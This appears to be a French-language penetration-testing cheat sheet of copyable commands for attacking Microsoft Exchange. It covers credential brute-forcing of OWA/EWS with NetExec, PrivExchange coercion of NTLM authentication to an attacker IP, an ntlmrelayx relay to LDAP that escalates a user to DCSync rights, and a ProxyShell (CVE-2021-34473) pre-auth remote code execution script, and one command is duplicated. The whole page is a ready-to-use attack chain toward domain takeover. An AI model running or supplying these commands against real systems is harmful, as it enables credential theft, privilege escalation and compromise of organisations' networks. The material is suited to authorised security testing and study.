Copy command
nxc http $TARGET -u $USER -p $PASS -M exchange_bruteDescription: Tester les creds sur OWA/EWS d'un serveur Exchange accessible.
Pre-Exploitation
PrivExchange, ProxyShell et relay NTLM via Exchange pour escalade domaine.
nxc http $TARGET -u $USER -p $PASS -M exchange_bruteDescription: Tester les creds sur OWA/EWS d'un serveur Exchange accessible.
python3 privexchange.py -ah $ATTACKER_IP $EXCHANGE_SERVER -u $USER -p $PASS -d $DOMAINDescription: PrivExchange : forcer Exchange à s'authentifier NTLM vers nous via l'API EWS.
ntlmrelayx.py -t ldap://$DC --escalate-user $USERDescription: Relay le hash Exchange vers LDAP pour escalader l'utilisateur courant vers DCSync.
python3 proxyshell.py -u https://$EXCHANGE_SERVER -e administrator@$DOMAINDescription: ProxyShell (CVE-2021-34473) : RCE pré-auth sur Exchange non patché.